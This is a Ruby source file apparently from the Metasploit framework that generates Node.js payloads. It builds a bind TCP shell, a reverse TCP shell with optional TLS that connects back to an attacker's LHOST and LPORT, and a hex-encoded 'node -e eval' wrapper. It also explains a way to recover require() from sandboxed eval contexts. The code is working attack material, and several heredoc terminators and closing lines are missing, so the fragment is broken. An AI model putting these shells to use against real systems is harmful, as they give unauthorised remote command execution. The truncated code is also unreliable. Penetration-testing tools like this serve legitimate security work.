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# -*- coding: binary -*-
require 'msf/core'
module Msf::Payload::NodeJS
# Outputs a javascript snippet that spawns a bind TCP shell
# @return [String] javascript code that executes bind TCP payload
def nodejs_bind_tcp
cmd = <<-EOS
var require = global.require || global.process.mainModule.constructor._load;
if (!require) return;
var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh";
var net = require("net"),
cp = require("child_process"),
util = require("util");
var server = net.createServer(function(socket) {
var sh = cp.spawn(cmd, []);
util.pump(sh.stdout, socket);
util.pump(sh.stderr, socket);
cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
# Outputs a javascript snippet that spawns a reverse TCP shell
# @param [Hash] opts the options to create the reverse TCP payload with
# @option opts [Boolean] :use_ssl use SSL when communicating with the shell. defaults to false.
# @return [String] javascript code that executes reverse TCP payload
def nodejs_reverse_tcp(opts={})
use_ssl = opts.fetch(:use_ssl, false)
tls_hash = if use_ssl then '{rejectUnauthorized:false}, ' else '' end
net_lib = if use_ssl then 'tls' else 'net' end
lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
# the global.process.mainModule.constructor._load fallback for require() is
# handy when the payload is eval()'d into a sandboxed context: the reference
# to 'require' is missing, but can be looked up from the 'global' object.
# however, this fallback might break in later versions of nodejs.
cmd = <<-EOS
var require = global.require || global.process.mainModule.constructor._load;
if (!require) return;
var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh";
var net = require("#{net_lib}"),
cp = require("child_process"),
util = require("util"),
sh = cp.spawn(cmd, []);
var client = this;
client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
util.pump(sh.stdout, client.socket);
util.pump(sh.stderr, client.socket);
cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
# Wraps the javascript code param in a "node" command invocation
# @param [String] code the javascript code to run
# @return [String] a command that invokes "node" and passes the code
def nodejs_cmd(code)
"node -e 'eval(\"#{Rex::Text.to_hex(code, "\\x")}\");'"